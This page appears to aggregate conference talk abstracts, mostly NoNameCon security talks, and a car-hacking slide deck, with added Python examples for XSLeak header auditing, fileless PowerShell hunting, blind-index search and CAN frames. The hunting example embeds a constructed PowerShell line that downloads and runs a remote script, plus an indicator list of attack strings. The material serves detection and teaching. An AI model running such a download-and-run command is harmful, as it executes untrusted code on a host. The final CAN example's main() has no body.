- The mobile web has already won
- What this means for webmasters
- Which tools Google offers to make sites more "mobile-friendly"
- And which ranking changes it is rolling out
Talk at the Optimization 2016 conference.
This presentation was prepared for Boris Lepinskikh's master class. It will help you understand how you can scale up your business in the e-commerce segment.
1. Main text-ranking factors.
a) Word occurrence and word weight.
Significance of the factors.
Recommendations.
b) Phrase matches.
Match types.
Use in search and in practice.
c) Synonyms.
Definition.
Use in the text and on the site.
2. Anti-spam vs. ranking.
3. Practical recommendations for writing a copywriter brief.
a) Formulating requirements for the copywriter (the brief).
b) Main mistakes optimizers make when writing the brief.
4. Recommendations.
Hardware counters guarding performance - Sergey Kuksenko
When analysing application performance you often have to do a lot of digging. But digging alone is not enough; you also have to sift through what you dug up. The Iron Age began more than 3000 years ago, and it would be surprising if in all that time humanity had not produced a pile of assorted iron tools for digging and sifting.
This talk explains what Hardware Performance Counters are, where to find them, and how to use them for performance analysis.
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van... (NoNameCon)
https://cfp.nonamecon.org/nnc2020/talk/9LMJAH/
For many years, injection-based vulnerabilities such as XSS and SQL injection have dominated the web security landscape. However, as browsers and applications become increasingly complex, new vulnerability classes surface. One of these new-kids-on-the-block is XSLeaks, a vulnerability class that exploits side-channel leaks in the browser to extract information across origins. In this presentation, I will describe the various types of leaks in different browser features and the network layer, and discuss how these issues can be exploited to extract sensitive information from an unwitting victim. Furthermore, the talk will cover the numerous (new) defences that need to be adopted in order to safeguard web applications (SameSite cookies, COOP, COEP, ...), and their potential shortcomings. Finally, we will take a peek into the future, and discuss how XSLeaks will likely evolve in the coming months and years.
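The abstract names the defences (SameSite cookies, COOP, COEP, ...) but not how to check for them. The following is an added example, not code from the talk or its speaker: it parses a raw HTTP response head and reports which of those isolation headers are missing, and it implements a Fetch-Metadata resource-isolation policy for incoming requests. Cross-Origin-Resource-Policy and Fetch Metadata are this editor's additions under the abstract's "..."; the two sample responses are constructed.

```python
"""Audit a response for XSLeak-relevant isolation headers and apply a
Fetch-Metadata isolation policy to requests.  Added example, not the talk's code."""

# Constructed sample responses: a typical unhardened app and a hardened one.
WEAK_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: session=abc123; Path=/; HttpOnly
"""

HARDENED_RESPONSE = """HTTP/1.1 200 OK
Content-Type: text/html
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-origin
Set-Cookie: session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax
"""


def parse_response_head(raw: str):
    """Split a raw HTTP response head into (status_line, [(name_lower, value), ...])."""
    lines = raw.strip().splitlines()
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def cookie_attrs(set_cookie: str) -> dict:
    """Return {attribute_lower: value_lower} for one Set-Cookie header value."""
    attrs = {}
    for part in set_cookie.split(";")[1:]:
        key, _, val = part.strip().partition("=")
        attrs[key.strip().lower()] = val.strip().lower()
    return attrs


def audit_xsleak_defenses(headers) -> list:
    """Return findings for missing or weak isolation headers; [] means all present."""
    plain, cookies = {}, []
    for name, value in headers:
        if name == "set-cookie":
            cookies.append(value)
        else:
            plain[name] = value.lower()
    findings = []
    if plain.get("cross-origin-opener-policy") != "same-origin":
        findings.append("COOP missing or not 'same-origin': cross-origin openers keep a window "
                        "reference (frame counting, navigation-based leaks)")
    if plain.get("cross-origin-embedder-policy") not in ("require-corp", "credentialless"):
        findings.append("COEP missing: cross-origin subresources load with credentials by default")
    if plain.get("cross-origin-resource-policy") not in ("same-origin", "same-site"):
        findings.append("CORP missing: response can be embedded cross-site as a no-cors subresource")
    for cookie in cookies:
        name = cookie.split("=", 1)[0].strip()
        attrs = cookie_attrs(cookie)
        same_site = attrs.get("samesite")
        if same_site not in ("lax", "strict"):
            findings.append(f"cookie {name!r}: SameSite is {same_site or 'absent'}; "
                            "cross-site requests may carry the session")
        if same_site == "none" and "secure" not in attrs:
            findings.append(f"cookie {name!r}: SameSite=None without Secure is rejected by browsers")
    return findings


def resource_isolation_policy(req_headers: dict, method: str = "GET") -> bool:
    """Fetch-Metadata isolation: allow same-origin/same-site/direct requests and
    top-level GET navigations; reject other cross-site requests before app logic runs."""
    hdr = {k.lower(): v.lower() for k, v in req_headers.items()}
    site = hdr.get("sec-fetch-site")
    if site is None:  # browser without Fetch Metadata support: cannot decide here
        return True
    if site in ("same-origin", "same-site", "none"):
        return True
    if (hdr.get("sec-fetch-mode") == "navigate" and method.upper() == "GET"
            and hdr.get("sec-fetch-dest") not in ("object", "embed")):
        return True
    return False


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_xsleak_defenses(parse_response_head(raw)[1]))
```

The audit treats an absent SameSite attribute as a finding even though current Chromium defaults it to Lax, because that default is not guaranteed across browsers and the talk's point is to set it explicitly. The isolation policy is the widely published Fetch-Metadata pattern; whether to accept `same-site` depends on whether sibling subdomains are trusted.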
Originally published
https://speakerdeck.com/vixentael/data-encryption-cyberkids-edition
Exercises
https://www.dropbox.com/s/rbyvvaw9c7vs4ib/cyberkids-encryption-example.pdf?dl=0
NoName CyberKids – charity event for kids and their parents during NoNameCon to teach basics of privacy, security, encryption, anti-bullying, behaviour in social networks, lock picking.
https://nonamecon.org
https://www.facebook.com/events/2048121308814429/
Ihor Malchenyuk – What is privacy and how to protect it [NoName CyberKids] (NoNameCon)
NoName CyberKids – charity event for kids and their parents during NoNameCon to teach basics of privacy, security, encryption, anti-bullying, behaviour in social networks, lock picking.
https://nonamecon.org
https://www.facebook.com/events/2048121308814429/
Original slides
https://www.slideshare.net/OlgaPasko/hunting-fileless-malware-149129867
Workshop by Olha Pasko at NoNameCon 2019.
https://nonamecon.org
Fileless malware and system tools as bypass techniques in cyber-attack. Hunting with SysInternals tools and Digital Forensics techniques.
1. Fileless malware and system tools as bypass technique: an explanation of "bypass technique" and "fileless malware". Creating custom fileless malware by abusing PowerShell.
2. Threat hunting with Sysinternals tools: an explanation of system processes, threads, jobs, resources. Anomaly detection of system processes with Sysinternals tools. Fileless malware detection.
3. Threat hunting with Digital Forensics techniques: an explanation of “digital forensics”. Acquisition and analysis of RAM memory dump with Digital Forensics tools.
4. Summary, or "what participants can take away from this workshop": knowledge of the top bypass techniques, hands-on skills for detecting and hunting malicious code, and an understanding of the differences between hunting with Sysinternals tools and with digital forensics tools.
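Parts 1 and 2 of the workshop cover PowerShell abuse and anomaly detection of system processes. The block below is an added example, not material from the workshop or its author: it runs simple hunting rules over constructed process-creation events (the fields Sysmon or Process Monitor would give you), decodes a `-EncodedCommand` payload the way the "fileless" stagers hide it, and scores each event on command-line indicators and on an Office application spawning PowerShell. The indicator list, weights, and sample events are this editor's assumptions.

```python
"""Hunt fileless PowerShell activity in process-creation telemetry.
Added example; sample events and indicator weights are constructed."""
import base64
import re

# Constructed payload of the kind a fileless stager carries, base64-encoded as
# PowerShell expects it (UTF-16LE), so the sample event below is realistic.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

EVENTS = [  # constructed process-creation events
    {"pid": 4012, "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users"},
    {"pid": 5120, "image": "powershell.exe", "parent": "WINWORD.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"},
    {"pid": 5300, "image": "cmd.exe", "parent": "explorer.exe",
     "cmdline": "cmd.exe /c dir"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

INDICATORS = {  # lower-case substring -> weight (assumed values)
    "iex": 3, "invoke-expression": 3, "downloadstring": 3, "net.webclient": 2,
    "frombase64string": 2, "-w hidden": 2, "-windowstyle hidden": 2,
    "-nop": 1, "-ep bypass": 2, "-executionpolicy bypass": 2,
    "reflection.assembly": 3, "invoke-mimikatz": 5,
}
# Parents that have no business launching PowerShell in most environments.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "mshta.exe", "wscript.exe"}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict):
    """Score one event: (score, reasons).  Decoded payload is scanned too,
    so encoding does not hide the indicators."""
    cmd = event["cmdline"]
    text = cmd.lower()
    score, reasons = 0, []
    decoded = decode_encoded_command(cmd)
    if decoded:
        score += 2
        reasons.append("encoded command")
        text += " " + decoded.lower()
    for needle, weight in INDICATORS.items():
        if needle in text:
            score += weight
            reasons.append(needle)
    if event["image"].lower() == "powershell.exe" and event["parent"].lower() in OFFICE_PARENTS:
        score += 4
        reasons.append(f"powershell spawned by {event['parent']}")
    return score, reasons


def hunt(events, threshold: int = 5):
    """Return (pid, score, reasons) for every event at or above the threshold."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event["pid"], score, reasons))
    return hits


if __name__ == "__main__":
    for pid, score, reasons in hunt(EVENTS):
        print(pid, score, ", ".join(reasons))
```

Substring scoring is deliberately crude; its value is that the decoded payload is scored alongside the raw command line, which is the step most naive rules skip. In a real hunt the same scoring would run over PowerShell script-block log text as well, since a stager that reads its next stage from memory never shows it on the command line.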
Nazar Tymoshyk - Automation in modern Incident Detection & Response (IDR) pro... (NoNameCon)
Talk by Nazar Tymoshyk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/GSRUTP/
Incident Detection & Response requires People - to Think, Tools - to provide data and analytics and Processes - to avoid fuckups and assure the quality. But with more alerts, the analysis takes more time, decisions and moreover - actions need to be taken immediately. Attackers actively use automation, so Defenders should also optimize their processes.
In our presentation, we'd like to share with the community our lessons learned. Our focus would be on practical moments, the challenges we faced and the simple working solutions we discovered.
We plan to challenge the audience with simple but vital questions that will help to establish a good communication bridge to make this delivery effective and valuable for engineers to improve their defense. We'd also like to discuss a variety of actions to be taken after the incident is confirmed. Come and take it.
Ruslan Kiyanchuk - Kalyna, Kupyna, and other flora of domestic cryptography (NoNameCon)
Talk by Ruslan Kiyanchuk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/NKB9UF/
An overview of Ukrainian cryptographic algorithms and standards
To replace the outdated Soviet encryption standard GOST 28147-89, inherited by many CIS countries, in 2006 the Security Service of Ukraine announced an open competition of cryptographic algorithms.
It took 8 years of development, bureaucracy, Maidan and a revolution for the standard to finally be adopted: in 2015 the world saw DSTU 7624:2014 and DSTU 7564:2014 (ДСТУ 7624:2014, ДСТУ 7564:2014), the Ukrainian national standards for cryptographic protection of information, developed by Ukrainian cryptographers. The standardised algorithms are the block cipher Kalyna and the hash function Kupyna.
The talk covers the terms and course of the competition, the cryptographic algorithms that took part in it, their properties, advantages and disadvantages, as well as prospects for their use in modern information systems.
Artem Storozhuk - Search over encrypted records: from academic dreams to prod... (NoNameCon)
Talk by Artem Storozhuk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/NUMHDY/
Search over encrypted data is a modern cryptographic engineering problem. We will talk about existing approaches (both well-known and modern) and concentrate on a practical solution based on the blind index technique for searching data in databases. What's inside: cryptographic and functional schemes, implementation details, practical security evaluation (risk modelling and potential attacks). We will show how theoretical models turn into real, usable, maintainable security tools.
Lately most conscious companies store data in databases encrypted, but search over encrypted data is still a challenge. There are many existing academic solutions proposed over the years, like CryptDB, Homomorphic/SSE, PEKS, Mylar. Unfortunately, most approaches are far from being production ready, usable and maintainable.
We will show a practical solution that is based on a hardened version of blind indexing, a long-known technique that has several usability constraints and security caveats. There is an open source implementation, CipherSweet, and cryptographically it's pretty solid, but it stores keys on the client side, which may lead to potential problems during usage.
Our solution doesn't share this design approach, since the generation of index references and the keys for them are kept on a separate node, away from all untrusted sides (client application, backend application, database). Also, our solution enforces several limitations on data, which limits the collision risks mentioned in the original technique.
We will explain in detail how it works, show the functional and cryptographic schemes, and dig into implementation details. We will show attendees the process of building a complex security tool from theoretical concepts (and mathematical models) to production-ready software.
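The abstract describes blind indexing, the collision risk that truncation brings, and a design where index keys live on a separate node away from client, backend and database. The following is an added example written for this page, not the speaker's code or any product's: a keyed-HMAC blind index over normalised values, truncated to a chosen number of bits, with false positives removed after decryption. `KeyNode`, `EncryptedStore` and `Backend` are hypothetical names for the three parties the abstract separates; the HMAC-SHA256 counter-mode cipher is a standard-library stand-in for AES-GCM so the block runs without third-party packages, and the records are constructed.

```python
"""Blind-index search over encrypted records, with keys confined to one node.
Added example; party names, cipher stand-in and sample records are assumptions."""
import hashlib
import hmac
import json
import os
import unicodedata


def normalize(value: str) -> str:
    """Canonicalise before indexing: 'Alice@Example.com ' and 'alice@example.com'
    must land in the same bucket, otherwise searches silently miss."""
    return unicodedata.normalize("NFKC", value).strip().casefold()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode: a stdlib stand-in for AES-GCM (assumption)."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


class KeyNode:
    """Hypothetical trusted node: the only place keys exist.  Client, backend and
    database never see them; they ask this node for indexes and (un)sealing."""

    def __init__(self):
        master = os.urandom(32)
        self._enc_key = hmac.new(master, b"enc", hashlib.sha256).digest()
        self._mac_key = hmac.new(master, b"mac", hashlib.sha256).digest()
        self._index_keys = {}  # one independent random key per indexed field

    def blind_index(self, field: str, value: str, bits: int) -> str:
        assert 0 < bits <= 32
        key = self._index_keys.setdefault(field, os.urandom(32))
        mac = hmac.new(key, normalize(value).encode(), hashlib.sha256).digest()
        # Truncate to `bits`: fewer bits means more false positives (filtered out
        # after decryption) but less leakage about how many distinct values exist.
        tag = int.from_bytes(mac[:4], "big") >> (32 - bits)
        return f"{tag:0{(bits + 3) // 4}x}"

    def seal(self, plaintext: bytes) -> bytes:
        nonce = os.urandom(16)
        ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(self._enc_key, nonce, len(plaintext))))
        tag = hmac.new(self._mac_key, nonce + ct, hashlib.sha256).digest()[:16]
        return nonce + ct + tag

    def open(self, blob: bytes) -> bytes:
        nonce, ct, tag = blob[:16], blob[16:-16], blob[-16:]
        expect = hmac.new(self._mac_key, nonce + ct, hashlib.sha256).digest()[:16]
        if not hmac.compare_digest(tag, expect):
            raise ValueError("record failed authentication")
        return bytes(a ^ b for a, b in zip(ct, _keystream(self._enc_key, nonce, len(ct))))


class EncryptedStore:
    """Untrusted database: holds ciphertext blobs and blind indexes only."""

    def __init__(self):
        self.rows = []  # (row_id, blob, {field: index})

    def insert(self, row_id, blob, indexes):
        self.rows.append((row_id, blob, indexes))

    def lookup(self, field, index):
        return [(rid, blob) for rid, blob, idx in self.rows if idx.get(field) == index]


class Backend:
    """Application side: stores and searches records through the key node."""

    def __init__(self, keys: KeyNode, db: EncryptedStore, bits: int = 16):
        self.keys, self.db, self.bits = keys, db, bits

    def put(self, row_id, record: dict, indexed_fields):
        blob = self.keys.seal(json.dumps(record).encode())
        indexes = {f: self.keys.blind_index(f, record[f], self.bits) for f in indexed_fields}
        self.db.insert(row_id, blob, indexes)

    def find(self, field: str, value: str):
        """Exact-match search: index lookup, then decrypt and drop false positives."""
        candidates = self.db.lookup(field, self.keys.blind_index(field, value, self.bits))
        wanted = normalize(value)
        return [(rid, rec) for rid, blob in candidates
                for rec in [json.loads(self.keys.open(blob))]
                if normalize(rec[field]) == wanted]


def demo(n_records: int = 200, bits: int = 4) -> Backend:
    """Load constructed records with a deliberately tiny index (16 buckets) so
    that collisions occur and the post-decryption filter has work to do."""
    backend = Backend(KeyNode(), EncryptedStore(), bits=bits)
    for i in range(n_records):
        backend.put(i, {"email": f"user{i:03d}@example.com", "plan": "free"}, ["email"])
    return backend


if __name__ == "__main__":
    print(demo().find("email", "  USER042@Example.COM "))
```

Two things the block makes concrete from the abstract: the database only ever compares opaque index strings, so it can answer a query without learning the value, and the width of the truncation is the knob between leakage (wide index, few collisions, frequency analysis gets easier) and cost (narrow index, many decryptions per query). The filter after decryption is what makes a narrow index safe to use.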
Stephanie Vanroelen - Mobile Anti-Virus apps exposed (NoNameCon)
Talk by Stephanie Vanroelen at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/ZFJFW8/
This talk is about top anti-virus apps on mobile. An in-depth look at how they work and what they do. Do they add to or break the security of the mobile OS?
This talk is about top anti-virus apps on Android. An in-depth look at how they work and what they do.
The focus will be on the top 5 android apps:
Kaspersky Mobile Antivirus
Avast Mobile Security
Norton Security & Antivirus
Sophos Mobile Security
Security Master
This talk will try to answer the following questions: Do they add to or break the security of the Android sandbox system? What type of information is being shared back to the company (if any)? Are these apps well built?
Finally, I will address the following: Do I recommend any of these apps and if so which one and why?
Oksana Safronova - Will you detect it or not? How to check if security team i... (NoNameCon)
Talk by Oksana Safronova at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/AXCDXU/
Before a real incident happens, a security team must test its detection capabilities in different ways. An overview of the MITRE ATT&CK Matrix, test environments and other friends of the Blue Team.
Obstacles, unexpected discoveries, lack of information, a flood of logs, new technologies: you will meet them all if you want to build an effective defense team. The talk will expand on the following topics based on the experience we have:
How to test the security team's detection and incident response processes
Best practices for endpoint monitoring tools configuration
Some problems that a defense team can encounter
Additional resources that can help you detect threats
Bert Heitink - 10 major steps for Cybersecurity (NoNameCon)
Talk by Bert Heitink at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/DXN7DM/
There's no such thing as 100% security, but this talk will demonstrate 10 main topics that need attention to reduce the risk of being hacked.
Our current digital era creates a lot of possibilities, also for Ukraine! But how to deal with the threats on the business and national level? 10 pragmatic steps you cannot ignore and that are indisputable. Some are easy to implement, even tomorrow.
Ievgen Kulyk - Advanced reverse engineering techniques in unpacking (NoNameCon)
Talk by Ievgen Kulyk at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/HMVMNL/
There are a lot of packers/protectors used to hide the functionality of software. Sometimes this software is legal, sometimes malicious. It is vital to be able to unpack such software for further investigation. But the main issue is that many commercial protections use different algorithms to make automating unpacking difficult. We will discuss more advanced techniques that are powerful and can be used to break strong protection. We will talk about debugging without the debugging API. Yeah, it's strange, but it's real life.
When debugging, we often talk about the debugging API on Windows or the ptrace routine on Linux. These mechanisms are provided by OS developers, so it is strongly recommended to use them for user-mode debugging (debugging in ring 3). But software protection systems can use a lot of techniques for detecting and preventing debugging.
In practical reverse engineering, anti-anti-debugging plugins can be used. The most famous of them: Phantom and StrongOD (for OllyDbg); ScyllaHide (for x64dbg, IDA Pro).
But such plugins can only protect from well-known detection algorithms. If an unknown technique is used, they will fail. So we will talk about how to implement your own tracing/debugging engine without the debugging API and hide such an engine from anti-debug. We will dive into kernel development and implement our engine from scratch.
Stanislav Kolenkin & Igor Khoroshchenko - Knock Knock: Security threats with ... (NoNameCon)
Talk by Stanislav Kolenkin & Igor Khoroshchenko at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/3EXNKX/
We will try to describe the most interesting security problems with Kubernetes environments from a DevOps and Security side.
We'll discuss the current cloud security threats and trends for 2019.
Look behind the curtain of modern data breaches, weak identity and access management and incident response flaws.
The rise of Serverless and Kubernetes as Enterprise solutions and lack of related security expertise during SDLC.
Summarize the analytics and practical research on adversaries' techniques and tactics, a mass scan of cloud services and the uncertainty of the business impacts behind them.
Provide materials for further education.
Pavlo Zhavoronkov - What is autumn like in prison camps? (NoNameCon)
Talk by Pavlo Zhavoronkov at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/BARKBD/
This speech will give you a complete understanding of how to get in jail by doing cybercrimes in Ukraine.
Speech contents:
The complete overview of Ukrainian court practice on articles in the section "CRIME IN THE FIELD OF USE OF ELECTRONIC COMPUTING MACHINES (COMPUTERS), SYSTEMS AND COMPUTER NETWORKS AND DIGITAL COMMUNICATIONS NETWORKS" of the Criminal Code of Ukraine.
Stories about the most famous Ukrainian cybercriminals.
Thoughts on current state of Ukrainian judicial system.
Alexander Olenyev & Andrey Voloshin - Car Hacking: Yes, You can do that! (NoNameCon)
Talk by Alexander Olenyev & Andrey Voloshin at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/AARZTL/
The complete list of (I hope) all {not only} publicly disclosed vulnerabilities in car hacking. Contains a detailed description of who, when and how has been hacked, toolz and techniques. Encourages every other-field pentester to use their skills in car hacking, giving fundamental knowledge of where to start and what to expect. Tesla, BMW, Toyota, Nissan: a few words about all of them.
Kostiantyn Korsun - State Cybersecurity vs. Cybersecurity of the State. #FRD ... (NoNameCon)
Talk by Kostiantyn Korsun at NoNameCon 2019.
https://nonamecon.org
https://cfp.nonamecon.org/nnc2019/talk/DA3TLK/
On the role of cyber-volunteers and cyber-officials in modern cyber-war
The cyber-war against Ukraine has been going on for five years. In that time Ukraine's regular armed forces have become one of the most combat-capable armies in Europe and the world. But has Ukraine's cyber-defence become just as strong?
Among other questions, the talk will discuss: the role of cyber-volunteers and cyber-officials in modern cyber-war; how effective state-funded cyber-defence is and what it costs the taxpayer; the estimated effectiveness of cyber-officials and the cyber-ministry; which path cyber-Ukraine should take: long or short, cheap or expensive, closed or transparent?
The presentation consists almost entirely of #FRD screenshots and shows a retrospective of the role of the #FRD volunteer initiative and how attitudes toward it changed over time.
Oleg Bondarenko - Threat Intelligence particularities world-wide. Real life u...
Alexander Olenyev & Andrey Voloshin - Car Hacking 101 by NoNameCon
1. Car Hacking 101
Andrey Voloshin
CTO @ Thea
https://thea-auto.com
andrey@thea-auto.com
fb.com/anvol
The automotive market is changing a lot. Vehicle security will improve, but a number of problems prevent it from being raised to the required level right now.
2. What we see as a single car or brand is made by hundreds of different companies. Moreover, suppliers differ for different geographic markets.
3. Tiered supply chain
The supplier structure for OEMs looks like this. Every participant in this chain has to secure its own processes and the components it supplies.
4. Attack vectors
[Diagram: attack vectors 1, 2, 3, 4; Aftermarket]
Four main attack vectors can be distinguished:
- component suppliers
- the car factory itself
- logistics and dealers
- the car owner and the car itself
5. Attack vectors
(diagram: vectors 1 to 4, plus Aftermarket)
1. PKI, secure boot, source codes, backdoors, etc
2. OEM backend infrastructure (including app stores, multimedia, databases, documentation)
3. Diagnostic equipment, engineer codes, key duplicates, etc
4. Control car, steal car, dump private data, etc
Each vector has its own prize. Overall, attacks on 3, 2 and 1 are the hardest (high-profile attacks) but also the most rewarding.
6. Percentage of respondents who want security but are unwilling to pay a premium for it
At the same time, market analysis shows that nobody is particularly willing to pay for security.
7. TL;DR — F* security
This creates a window of opportunity, where the trigger or incentive for rapidly introducing expensive protections will be an email one morning…
8. –Robert Bates, chief safety officer for automotive at Mentor, a Siemens Business
If I am the CEO of General Motors, five years
from now the last thing I want to see is an email
in my inbox in the morning that says
‘Pay me $2 billion or else all of your cars are
going to turn left.’
Every additional or more complex element makes the car more expensive. So new functionality appears first in top trims and models and only later migrates down to the cheap ones.
9. – Serious Anonymous
Yeah, go hack my Daewoo Lanos, lamo
But the bulk of the market is mid-range and cheap cars.
10. – Serious Anonymous
Most of them are cheap
How many Teslas do you see here? Porsches? These are cheap, affordable cars.
12. CANbus
• Development of the CANbus started in 1983 at Bosch
• No encryption, no authorization, broadcast, fully trusted network
• Released in 1986 at the Society of Automotive Engineers (SAE) conference in Detroit, Michigan
• A CAN device that uses 11-bit identifiers is commonly called CAN 2.0A
• A CAN device that uses 29-bit identifiers is commonly called CAN 2.0B
• The 1988 BMW 8 Series was the first production vehicle to feature a CAN-based multiplex wiring system
One of the ubiquitous improvements was the use of CANbus for data exchange between vehicle components.
13. CAN Network
A CAN network is a shared peer-to-peer (multi-master) bus with devices hanging off it; every node sees every frame.
14. A car may have several CAN buses running at different speeds.
15. The best-known connection point is the diagnostic connector. It is mandatory in passenger cars; certification for sale in Europe and the US requires it.
16. The instrument cluster is another convenient point to tap into and read data from the CAN bus.
19. In-vehicle Infotainment system
• Connectivity (BT, GSM, USB, WiFi)
• QNX — UNIX-like OS
• Connected to CANbus
Wireless and wired interfaces, CD/DVD, a full-blown OS, sometimes even with internet access. A common situation is that every OS task has full read/write access to the CAN bus. If you have worked at Luxoft on IVI development projects, you know far more details…
20. – 115th Congress (2017-2018): SPY Car Act of 2017
ISOLATION MEASURES.—The measures referred to in
subparagraph (A) shall incorporate isolation
measures to separate critical software systems from
noncritical software systems.
The lack of network segmentation is pretty dismal. It was through the IVI system that hackers took control of a Jeep and could remotely interfere with its operation. In the US, a bill was introduced in July to fine automakers for this kind of architectural blunder ($8k per car if there is no isolation).
21. With the arrival of ADAS (advanced driver-assistance systems), the number of sensors and interfaces through which one can get into the guts of the car has grown.
22. Attack
• Physical access: buy/rent a car, ECU, IVI and sniff it, prepare payloads
• Near access: FCC ID + Software Defined Radio, key fob relay/amplification attacks, PKES, flood or send malformed data to sensors
• AI specific: signal absorbing materials, fool AI with perturbations (next slide)
• Remote access: hack into backend infrastructure, OTA updates, app store, master keys, encryption keys
The attack plan looks like this:
- get hold of the car or its components and reverse them to understand how they work and to build payloads. This includes analysis of the wireless interfaces (immobilizer, key fobs, Passive Keyless Entry and Start systems), attacks on computer vision and machine learning, fuzzing.
- separately, remember that there is infrastructure running in the cloud which, like any other complex product, potentially contains vulnerabilities.
23. Universal adversarial perturbations
An interesting example of an attack (February 2018) on computer vision. Small perturbations added to an image radically change what the neural network recognises. "AI" is just matrix multiplication, whereas a human brain does not need a gazillion pictures of a toilet and a dalmatian to learn to tell them apart.
24. Tools
• Connectors
• Logic Analyzer
• CAN sniffer
• Hackware
Of the necessary tools, the CAN sniffer and the software for analysing the CAN bus stand out.
25. Tools
• OS setup: GNU/Linux, SocketCAN + can-utils (CAN -> USB -> can0)
• Software: Wireshark, SavvyCAN, etc
• Hardware: buy or DIY. Choose wisely, it should support the slcan/SocketCAN protocol. We chose STM32+MCP2551
• https://github.com/torvalds/linux/blob/master/drivers/net/can/slcan.c
The setup looks like this. I strongly recommend using devices that support SocketCAN/slcan. That lets you use the whole toolset that Volkswagen once contributed to the Linux kernel. Essentially, what is on this slide is what we will be doing and studying tomorrow at the workshop.
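As an added example (not the workshop's code), here is the SocketCAN side of that setup using only Python's standard library: the helpers pack and unpack the 16-byte `struct can_frame` that a CAN_RAW socket reads and writes, telling 11-bit (CAN 2.0A) identifiers from 29-bit (CAN 2.0B) ones, and `main()` sends one frame and dumps whatever the bus answers. It assumes a Linux host with SocketCAN and an interface named vcan0 (created with `ip link add dev vcan0 type vcan`), or a real can0 brought up by slcand; the ID 0x27 "engine temperature" frame is hypothetical.

```python
"""SocketCAN raw frames from Python (added example, not the workshop's code).

Assumes Linux with SocketCAN and an interface ``vcan0`` (or a ``can0`` set up
by slcand). Only main() touches the socket; the helpers are pure and can be
applied to captured bytes on any platform.
"""
import socket
import struct
import sys

# Layout of ``struct can_frame`` as read/written on a CAN_RAW socket:
# u32 can_id (flags in the top 3 bits), u8 dlc, 3 pad bytes, 8 data bytes.
CAN_FRAME_FMT = "=IB3x8s"
CAN_FRAME_SIZE = struct.calcsize(CAN_FRAME_FMT)   # 16

CAN_EFF_FLAG = 0x80000000   # extended (29-bit) identifier, i.e. CAN 2.0B
CAN_RTR_FLAG = 0x40000000   # remote transmission request
CAN_ERR_FLAG = 0x20000000   # error frame
CAN_SFF_MASK = 0x000007FF   # 11-bit identifier mask (CAN 2.0A)
CAN_EFF_MASK = 0x1FFFFFFF   # 29-bit identifier mask


def pack_frame(can_id: int, data: bytes, extended: bool = False) -> bytes:
    """Build the 16-byte can_frame for ``can_id``/``data``.

    Classic CAN carries at most 8 data bytes. An ID that does not fit in
    11 bits is rejected unless ``extended`` is set, in which case the EFF
    flag marks it as a 29-bit identifier.
    """
    if len(data) > 8:
        raise ValueError("classic CAN frames carry at most 8 data bytes")
    if extended:
        if can_id & ~CAN_EFF_MASK:
            raise ValueError("extended identifier exceeds 29 bits")
        can_id |= CAN_EFF_FLAG
    elif can_id & ~CAN_SFF_MASK:
        raise ValueError("standard identifier exceeds 11 bits (use extended=True)")
    return struct.pack(CAN_FRAME_FMT, can_id, len(data), data.ljust(8, b"\x00"))


def unpack_frame(raw: bytes) -> dict:
    """Decode a can_frame into its ID, flags and the DLC-trimmed payload."""
    if len(raw) != CAN_FRAME_SIZE:
        raise ValueError(f"expected {CAN_FRAME_SIZE} bytes, got {len(raw)}")
    can_id, dlc, data = struct.unpack(CAN_FRAME_FMT, raw)
    if dlc > 8:
        raise ValueError("DLC above 8 is not valid for classic CAN")
    extended = bool(can_id & CAN_EFF_FLAG)
    return {
        "id": can_id & (CAN_EFF_MASK if extended else CAN_SFF_MASK),
        "extended": extended,
        "rtr": bool(can_id & CAN_RTR_FLAG),
        "error": bool(can_id & CAN_ERR_FLAG),
        "data": data[:dlc],
    }


def fmt_frame(frame: dict) -> str:
    """Render like candump does: 11-bit IDs as 3 hex digits, 29-bit as 8."""
    width = 8 if frame["extended"] else 3
    return f"{frame['id']:0{width}X}#{frame['data'].hex().upper()}"


def main(iface: str = "vcan0") -> None:
    """Send one frame and dump the bus for two seconds (needs SocketCAN)."""
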